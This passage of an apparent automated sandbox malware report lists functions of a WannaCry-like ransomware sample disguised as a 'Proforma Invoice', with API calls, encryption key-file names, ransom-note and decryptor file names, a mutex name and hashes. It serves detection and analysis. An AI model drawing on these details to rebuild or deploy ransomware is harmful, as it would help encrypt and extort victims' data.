                                                            • Opcode ID: 6755539e03151ab4c1f16085f489a8dfdac46bb0bc8c46b8b9e925cdda5e6641
                                                            • Instruction ID: e60eb9cd5809f0a44785feabd90748945945c8a24abb44f707321f1dc85ab6e6
                                                            • Opcode Fuzzy Hash: 6755539e03151ab4c1f16085f489a8dfdac46bb0bc8c46b8b9e925cdda5e6641
                                                            • Instruction Fuzzy Hash: 28016234B04321EFF250AB66ACCCB5B3699FB856D2F510125F90DDB39CEF569C009661
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 10005730 Relevance: 9.0, APIs: 6, Instructions: 49threadsleepCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetLogicalDrives.KERNELBASE ref: 10005734
                                                            • Sleep.KERNELBASE(00000BB8), ref: 1000574A
                                                            • GetLogicalDrives.KERNELBASE ref: 10005752
                                                            • CreateThread.KERNEL32(00000000,00000000,10005680,00000003,00000000,00000000), ref: 1000578F
                                                            • CloseHandle.KERNEL32(00000000), ref: 1000579A
                                                            • ExitThread.KERNEL32 ref: 100057B1
                                                            Memory Dump Source
                                                            • Source File: 0000000A.00000002.3016843248.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                            • Associated: 0000000A.00000002.3016764861.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000A.00000002.3016943004.0000000010007000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000A.00000002.3017076372.000000001000C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000A.00000002.3017220316.000000001000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_10_2_10000000_Proforma Invoice and Bank swift-REG.jbxd
                                                            Similarity
                                                            • API ID: DrivesLogicalThread$CloseCreateExitHandleSleep
                                                            • String ID:
                                                            • API String ID: 1878306015-0
                                                            • Opcode ID: 5878980bfe0458395b54a1c59291aa8a91b878b02f3db5711459a8e660d042a6
                                                            • Instruction ID: d95954290e73e2fc4d81053873901ac5897467195d0022eac80ad00c69895781
                                                            • Opcode Fuzzy Hash: 5878980bfe0458395b54a1c59291aa8a91b878b02f3db5711459a8e660d042a6
                                                            • Instruction Fuzzy Hash: 02018634B04321DFF2409B66ACCCB5B3699FB806D2F510125F90DDB39CEF569C009661
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 10004990 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 51sleepCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • time.MSVCRT ref: 100049A8
                                                            • time.MSVCRT ref: 100049CC
                                                            • GetFullPathNameA.KERNEL32(tasksche.exe,00000208,?,00000000), ref: 10004A15
                                                            • Sleep.KERNELBASE(00007530), ref: 10004A29
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000A.00000002.3016843248.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                            • Associated: 0000000A.00000002.3016764861.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000A.00000002.3016943004.0000000010007000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000A.00000002.3017076372.000000001000C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000A.00000002.3017220316.000000001000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_10_2_10000000_Proforma Invoice and Bank swift-REG.jbxd
                                                            Similarity
                                                            • API ID: time$FullNamePathSleep
                                                            • String ID: tasksche.exe
                                                            • API String ID: 1626198026-4155512336
                                                            • Opcode ID: 63368ec97ce6c90e861054e7e62082db372e98ff563f1b21eac47bf49e227cdf
                                                            • Instruction ID: 6c277a82b2204c6dda298433eb915a288d4e8415d8d78be13cb5ccbe86c762d4
                                                            • Opcode Fuzzy Hash: 63368ec97ce6c90e861054e7e62082db372e98ff563f1b21eac47bf49e227cdf
                                                            • Instruction Fuzzy Hash: FC01F9B1A0435157F310E7649C81F6F3694FB847C1F010529FA489628EDE90B804C3B7
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 10004500 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 50COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • sprintf.MSVCRT ref: 10004528
                                                            • GetFileAttributesA.KERNELBASE(?), ref: 1000453C
                                                            • GetFileAttributesA.KERNEL32(00000000.pky), ref: 10004548
                                                              • Part of subcall function 10003A10: InitializeCriticalSection.KERNEL32(?,75AA3310,10004558), ref: 10003A28
                                                              • Part of subcall function 10003D10: CryptEncrypt.ADVAPI32(?,00000000,00000001,00000000,00000000,?,00000200,?,?,?,?,75AA3310,00000000), ref: 10003E2B
                                                              • Part of subcall function 10003D10: _local_unwind2.MSVCRT ref: 10003E3B
                                                              • Part of subcall function 10003A60: DeleteCriticalSection.KERNEL32(?,100045A2), ref: 10003A6A
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000A.00000002.3016843248.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                            • Associated: 0000000A.00000002.3016764861.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000A.00000002.3016943004.0000000010007000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000A.00000002.3017076372.000000001000C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000A.00000002.3017220316.000000001000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_10_2_10000000_Proforma Invoice and Bank swift-REG.jbxd
                                                            Similarity
                                                            • API ID: AttributesCriticalFileSection$CryptDeleteEncryptInitialize_local_unwind2sprintf
                                                            • String ID: %08X.dky$00000000.pky
                                                            • API String ID: 76522779-2125887231
                                                            • Opcode ID: 8a0e7567a4fa4835a183f6d327c371cb40c48a734cf9ee2ef7d227f4b83157cd
                                                            • Instruction ID: 425621f44f5a923abbbd61014c7ab598cc21be85551e84ab2481d09848a71f7a
                                                            • Opcode Fuzzy Hash: 8a0e7567a4fa4835a183f6d327c371cb40c48a734cf9ee2ef7d227f4b83157cd
                                                            • Instruction Fuzzy Hash: EB118875504B409FE315DB28CC42B9BB7E8FB887A0F504F1DF56A822D4DB38A545CB52
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 10002F70 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 40fileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetTempFileNameW.KERNELBASE(?,~SD,00000000,00000000), ref: 10002FA1
                                                            • CreateFileW.KERNELBASE(00000000,40000000,00000000,00000000,00000002,00000002,00000000), ref: 10002FBB
                                                            • CloseHandle.KERNEL32(00000000), ref: 10002FC8
                                                            • DeleteFileW.KERNELBASE(00000000), ref: 10002FD3
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000A.00000002.3016843248.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                            • Associated: 0000000A.00000002.3016764861.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000A.00000002.3016943004.0000000010007000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000A.00000002.3017076372.000000001000C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000A.00000002.3017220316.000000001000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_10_2_10000000_Proforma Invoice and Bank swift-REG.jbxd
                                                            Similarity
                                                            • API ID: File$CloseCreateDeleteHandleNameTemp
                                                            • String ID: ~SD
                                                            • API String ID: 3375149446-1091114838
                                                            • Opcode ID: 5e7cbfd5b58ad9321687849607920a6fa3127069c18f055f668ff46880186f9a
                                                            • Instruction ID: c2dd32fcde6a5bc41ecd7f9a6727c0a4d13da50b9158b9afa091e72ebafff611
                                                            • Opcode Fuzzy Hash: 5e7cbfd5b58ad9321687849607920a6fa3127069c18f055f668ff46880186f9a
                                                            • Instruction Fuzzy Hash: 00F0F63424430077F7109B64CD8EF6F73A8ABC0B80F904A2AF204E61E4E7B8D904C662
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 10003C40 Relevance: 7.6, APIs: 5, Instructions: 77COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000A.00000002.3016843248.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                            • Associated: 0000000A.00000002.3016764861.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000A.00000002.3016943004.0000000010007000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000A.00000002.3017076372.000000001000C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000A.00000002.3017220316.000000001000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_10_2_10000000_Proforma Invoice and Bank swift-REG.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: d0c54076f7a2448e10fc8be0b785496c0eb2b10ce162175e404115595b8610ef
                                                            • Instruction ID: 138f2fe033322ba65967f8616f38530b74b5918126c82026410a31d06e5ea73c
                                                            • Opcode Fuzzy Hash: d0c54076f7a2448e10fc8be0b785496c0eb2b10ce162175e404115595b8610ef
                                                            • Instruction Fuzzy Hash: C821B4B56443117FF210DB14DC85F9BB7ACEBC4B64F148529FB44A72C0D2B9A80A87A6
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 10004730 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 31fileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CreateFileA.KERNELBASE(00000000.res,40000000,00000001,00000000,00000004,00000080,00000000,00000000,?,10005A09), ref: 10004749
                                                            • WriteFile.KERNELBASE(00000000), ref: 10004775
                                                            • CloseHandle.KERNEL32(00000000), ref: 1000477C
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000A.00000002.3016843248.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                            • Associated: 0000000A.00000002.3016764861.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000A.00000002.3016943004.0000000010007000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000A.00000002.3017076372.000000001000C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000A.00000002.3017220316.000000001000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_10_2_10000000_Proforma Invoice and Bank swift-REG.jbxd
                                                            Similarity
                                                            • API ID: File$CloseCreateHandleWrite
                                                            • String ID: 00000000.res
                                                            • API String ID: 1065093856-1337945038
                                                            • Opcode ID: 9218bb890792affa764d680ff6986bd503153ba273b76b7626a1320ac949ddd2
                                                            • Instruction ID: 1a0995e2bfce3f695c42019c746602608884a1d24b5a512431a54d6d633dc8a9
                                                            • Opcode Fuzzy Hash: 9218bb890792affa764d680ff6986bd503153ba273b76b7626a1320ac949ddd2
                                                            • Instruction Fuzzy Hash: A7E0D17168132176F27057545C49FD62644F7447F2F204315F795E50D4DFE454444355
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 100046D0 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 31fileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CreateFileA.KERNELBASE(00000000.res,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,10005C55,00000000.pky,00000000.eky), ref: 100046E6
                                                            • ReadFile.KERNEL32(00000000,1000DC68,00000088,?,00000000,?,10005C55,00000000.pky,00000000.eky), ref: 10004712
                                                            • CloseHandle.KERNEL32(00000000,?,10005C55,00000000.pky,00000000.eky), ref: 10004719
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000A.00000002.3016843248.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                            • Associated: 0000000A.00000002.3016764861.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000A.00000002.3016943004.0000000010007000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000A.00000002.3017076372.000000001000C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000A.00000002.3017220316.000000001000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_10_2_10000000_Proforma Invoice and Bank swift-REG.jbxd
                                                            Similarity
                                                            • API ID: File$CloseCreateHandleRead
                                                            • String ID: 00000000.res
                                                            • API String ID: 1035965006-1337945038
                                                            • Opcode ID: 38f5d3609d688d52e39eed02e5728f1296c17493f38e7dd39a540115aba3ae98
                                                            • Instruction ID: 54c67b85065ce4f863d8689817c15c4f2f767631175da55968cfae2d4b84cbd0
                                                            • Opcode Fuzzy Hash: 38f5d3609d688d52e39eed02e5728f1296c17493f38e7dd39a540115aba3ae98
                                                            • Instruction Fuzzy Hash: 65E0D872681331BAF27067649C49FCA2A88EB04BF2F314326FB95F60D4DFE4554483A5
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 10005120 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 30fileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 10005060: GetWindowsDirectoryW.KERNEL32(?,00000104,?,?), ref: 10005075
                                                              • Part of subcall function 10005060: GetTempPathW.KERNEL32(00000104,?), ref: 10005094
                                                              • Part of subcall function 10005060: wcslen.MSVCRT ref: 100050A1
                                                              • Part of subcall function 10005060: wcslen.MSVCRT ref: 100050AB
                                                              • Part of subcall function 10005060: wcslen.MSVCRT ref: 100050B9
                                                            • swprintf.MSVCRT(?,%s\hibsys%s,?,.WNCRYT), ref: 1000516A
                                                            • DeleteFileW.KERNELBASE(?), ref: 10005174
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000A.00000002.3016843248.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                            • Associated: 0000000A.00000002.3016764861.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000A.00000002.3016943004.0000000010007000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000A.00000002.3017076372.000000001000C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000A.00000002.3017220316.000000001000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_10_2_10000000_Proforma Invoice and Bank swift-REG.jbxd
                                                            Similarity
                                                            • API ID: wcslen$DeleteDirectoryFilePathTempWindowsswprintf
                                                            • String ID: %s\hibsys%s$.WNCRYT
                                                            • API String ID: 1822766362-1629340253
                                                            • Opcode ID: c2125cb9b9528fd99c790bb07f7878e09f7b9727c9a924ceadf419b2fee26583
                                                            • Instruction ID: 2c74e765b5fe5e1610888ec37e9d1c160ce3ed4c59201b8465cba371c669a0b1
                                                            • Opcode Fuzzy Hash: c2125cb9b9528fd99c790bb07f7878e09f7b9727c9a924ceadf419b2fee26583
                                                            • Instruction Fuzzy Hash: 76F0A03550431477E310E708CC89EEFBBA8FFC4381F404928F58892295EB3AA61886E7
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 10004690 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 19synchronizationCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CreateMutexA.KERNELBASE(00000000,00000001,MsWinZonesCacheCounterMutexA,?,10005B11), ref: 1000469A
                                                            • GetLastError.KERNEL32(?,10005B11), ref: 100046A6
                                                            • CloseHandle.KERNEL32(00000000,?,10005B11), ref: 100046B4
                                                            Strings
                                                            • MsWinZonesCacheCounterMutexA, xrefs: 10004691
                                                            Memory Dump Source
                                                            • Source File: 0000000A.00000002.3016843248.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                            • Associated: 0000000A.00000002.3016764861.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000A.00000002.3016943004.0000000010007000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000A.00000002.3017076372.000000001000C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000A.00000002.3017220316.000000001000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_10_2_10000000_Proforma Invoice and Bank swift-REG.jbxd
                                                            Similarity
                                                            • API ID: CloseCreateErrorHandleLastMutex
                                                            • String ID: MsWinZonesCacheCounterMutexA
                                                            • API String ID: 4294037311-694093751
                                                            • Opcode ID: b4423007a58e0f84b666c0c66b10e299a80b8cce86534432c0e4c48c6a08cb45
                                                            • Instruction ID: 338334782f2b9e7042141e46606865c077db62d8e45c1ffbdd960e7d74596030
                                                            • Opcode Fuzzy Hash: b4423007a58e0f84b666c0c66b10e299a80b8cce86534432c0e4c48c6a08cb45
                                                            • Instruction Fuzzy Hash: 88D0A731905932D7F6606B24BCC87CF2A40EB027E1F030260FA0CE559DEB598C8148E6
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 10003200 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 16fileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • swprintf.MSVCRT(?,%s\%s,?,@Please_Read_Me@.txt), ref: 1000321A
                                                            • CopyFileW.KERNELBASE(@Please_Read_Me@.txt,?,00000001), ref: 1000322F
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000A.00000002.3016843248.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                            • Associated: 0000000A.00000002.3016764861.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000A.00000002.3016943004.0000000010007000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000A.00000002.3017076372.000000001000C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000A.00000002.3017220316.000000001000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_10_2_10000000_Proforma Invoice and Bank swift-REG.jbxd
                                                            Similarity
                                                            • API ID: CopyFileswprintf
                                                            • String ID: %s\%s$@Please_Read_Me@.txt
                                                            • API String ID: 1805135926-3539309323
                                                            • Opcode ID: c411f0acc78ad9d9e9ffb173ee46626fa9530a000aff35feebebf6a00c7dad47
                                                            • Instruction ID: 80308d71e87a2662e96619a8ebef87edecea0aea765e2410c23067d00ef2c009
                                                            • Opcode Fuzzy Hash: c411f0acc78ad9d9e9ffb173ee46626fa9530a000aff35feebebf6a00c7dad47
                                                            • Instruction Fuzzy Hash: 8BD01771818204BFF314DB68DD89EBA7268FB84384F448A08F65D90198D73599288A67
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 10003240 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 16fileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • swprintf.MSVCRT(?,%s\%s,?,@WanaDecryptor@.exe.lnk), ref: 1000325A
                                                            • CopyFileW.KERNELBASE(@WanaDecryptor@.exe.lnk,?,00000001), ref: 1000326F
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000A.00000002.3016843248.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                            • Associated: 0000000A.00000002.3016764861.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000A.00000002.3016943004.0000000010007000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000A.00000002.3017076372.000000001000C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000A.00000002.3017220316.000000001000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_10_2_10000000_Proforma Invoice and Bank swift-REG.jbxd
                                                            Similarity
                                                            • API ID: CopyFileswprintf
                                                            • String ID: %s\%s$@WanaDecryptor@.exe.lnk
                                                            • API String ID: 1805135926-795331943
                                                            • Opcode ID: c250b24136dea1bfe6b7898258367bb7c04f3b9dc65f4485c6e2413ddd54f61a
                                                            • Instruction ID: aabba5d832825d18aa2892ebc93e0d9c0cb5ad894a116947d65cfddac51ae073
                                                            • Opcode Fuzzy Hash: c250b24136dea1bfe6b7898258367bb7c04f3b9dc65f4485c6e2413ddd54f61a
                                                            • Instruction Fuzzy Hash: C5D01771814204BFF318DB68DD89FBA7268FB84384F448908F65D90198D73599288667
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 10003280 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 16fileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • swprintf.MSVCRT(?,%s\%s,?,@WanaDecryptor@.exe), ref: 1000329A
                                                            • CopyFileW.KERNELBASE(@WanaDecryptor@.exe,?,00000001), ref: 100032AF
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000A.00000002.3016843248.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                            • Associated: 0000000A.00000002.3016764861.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000A.00000002.3016943004.0000000010007000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000A.00000002.3017076372.000000001000C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000A.00000002.3017220316.000000001000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_10_2_10000000_Proforma Invoice and Bank swift-REG.jbxd
                                                            Similarity
                                                            • API ID: CopyFileswprintf
                                                            • String ID: %s\%s$@WanaDecryptor@.exe
                                                            • API String ID: 1805135926-3253365116
                                                            • Opcode ID: c732863aad36b8ae60cc70cd27384ffc3547b56df3ffae6353cc428869aacd62
                                                            • Instruction ID: 59ab5ee0cc2050cc8eb19bdd64a6c19fde071768e575255f68a05fb53c163eac
                                                            • Opcode Fuzzy Hash: c732863aad36b8ae60cc70cd27384ffc3547b56df3ffae6353cc428869aacd62
                                                            • Instruction Fuzzy Hash: 58D05E71814304BFF314DBA8DD89FBA7368FB84384F448909F65D90198D73999288677
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 100027F0 Relevance: 6.1, APIs: 4, Instructions: 111COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ??2@YAPAXI@Z.MSVCRT ref: 1000281A
                                                              • Part of subcall function 10002300: ??2@YAPAXI@Z.MSVCRT ref: 10002332
                                                              • Part of subcall function 10002300: swprintf.MSVCRT ref: 10002388
                                                              • Part of subcall function 10002300: FindFirstFileW.KERNELBASE(?,?,?,00000000,00000000,?), ref: 1000239E
                                                              • Part of subcall function 10002300: ??3@YAXPAX@Z.MSVCRT ref: 100023D2
                                                              • Part of subcall function 10002300: ??3@YAXPAX@Z.MSVCRT ref: 10002404
                                                            • ??3@YAXPAX@Z.MSVCRT ref: 10002899
                                                            • ??3@YAXPAX@Z.MSVCRT ref: 100028FD
                                                            • ??3@YAXPAX@Z.MSVCRT ref: 10002917
                                                            Memory Dump Source
                                                            • Source File: 0000000A.00000002.3016843248.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                            • Associated: 0000000A.00000002.3016764861.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000A.00000002.3016943004.0000000010007000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000A.00000002.3017076372.000000001000C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000A.00000002.3017220316.000000001000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_10_2_10000000_Proforma Invoice and Bank swift-REG.jbxd
                                                            Similarity
                                                            • API ID: ??3@$??2@$FileFindFirstswprintf
                                                            • String ID:
                                                            • API String ID: 47495585-0
                                                            • Opcode ID: b9215957a0174dcbb67c64f1cfad39bca1906317c31bbff98873d6941a2761fe
                                                            • Instruction ID: 82684585b8c809215c3c6d914d8a3584cbabbf0c50e88e9df694160166eba937
                                                            • Opcode Fuzzy Hash: b9215957a0174dcbb67c64f1cfad39bca1906317c31bbff98873d6941a2761fe
                                                            • Instruction Fuzzy Hash: BE4158B96043419FE304DF18C880B1AB7E5FF88354F148A6DE9959B3A5DB30EC05CB92
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 10005480 Relevance: 6.1, APIs: 4, Instructions: 65COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SHGetFolderPathW.SHELL32(00000000,00000000,00000000,00000000,75AA0F00,75AA0F00,00000000,00000000), ref: 100054B6
                                                            • wcslen.MSVCRT ref: 100054C3
                                                            • SHGetFolderPathW.SHELL32(00000000,00000005,00000000,00000000,?), ref: 100054F5
                                                            • wcslen.MSVCRT ref: 100054FC
                                                              • Part of subcall function 100027F0: ??2@YAPAXI@Z.MSVCRT ref: 1000281A
                                                              • Part of subcall function 100027F0: ??3@YAXPAX@Z.MSVCRT ref: 100028FD
                                                              • Part of subcall function 100027F0: ??3@YAXPAX@Z.MSVCRT ref: 10002917
                                                            Memory Dump Source
                                                            • Source File: 0000000A.00000002.3016843248.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                            • Associated: 0000000A.00000002.3016764861.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000A.00000002.3016943004.0000000010007000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000A.00000002.3017076372.000000001000C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000A.00000002.3017220316.000000001000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_10_2_10000000_Proforma Invoice and Bank swift-REG.jbxd
                                                            Similarity
                                                            • API ID: ??3@FolderPathwcslen$??2@
                                                            • String ID:
                                                            • API String ID: 2093780229-0
                                                            • Opcode ID: d163edc3916c72bdfd07bfe83d2c2948d88e62c2738cec1ca9194f5dc8d6a920
                                                            • Instruction ID: ae209c0b6bb9dcbb05d21899376679ada1f922680f23bc9f9cb6150d3ff098d6
                                                            • Opcode Fuzzy Hash: d163edc3916c72bdfd07bfe83d2c2948d88e62c2738cec1ca9194f5dc8d6a920
                                                            • Instruction Fuzzy Hash: 3211E3796843057AF610E724CC82F9B7398EFC4790F008829B749961C5EAF4B5048B66
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 100021AC Relevance: 6.0, APIs: 4, Instructions: 22fileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 0000000A.00000002.3016843248.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                            • Associated: 0000000A.00000002.3016764861.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000A.00000002.3016943004.0000000010007000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000A.00000002.3017076372.000000001000C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000A.00000002.3017220316.000000001000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_10_2_10000000_Proforma Invoice and Bank swift-REG.jbxd
                                                            Similarity
                                                            • API ID: CloseHandle$DeleteFilewcslen
                                                            • String ID:
                                                            • API String ID: 3508958691-0
                                                            • Opcode ID: 922f722e5c418f7af27600eb4e498b6c2fd2021f8fe4a9803ef1495644ed2b51
                                                            • Instruction ID: 7a28d7368fef7b69181b6a677d113c0d8526011b338f6f6515615cb3a9903244
                                                            • Opcode Fuzzy Hash: 922f722e5c418f7af27600eb4e498b6c2fd2021f8fe4a9803ef1495644ed2b51
                                                            • Instruction Fuzzy Hash: 9EE01A70D021289BEF15EB74CD885DD77B8BB143E5F510691FA2AE20E8D7349F868B50
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 100053F0 Relevance: 3.0, APIs: 2, Instructions: 34COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 0000000A.00000002.3016843248.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                            • Associated: 0000000A.00000002.3016764861.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000A.00000002.3016943004.0000000010007000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000A.00000002.3017076372.000000001000C000.00000004.00001000.00020000.00000000.sdmpDownload File
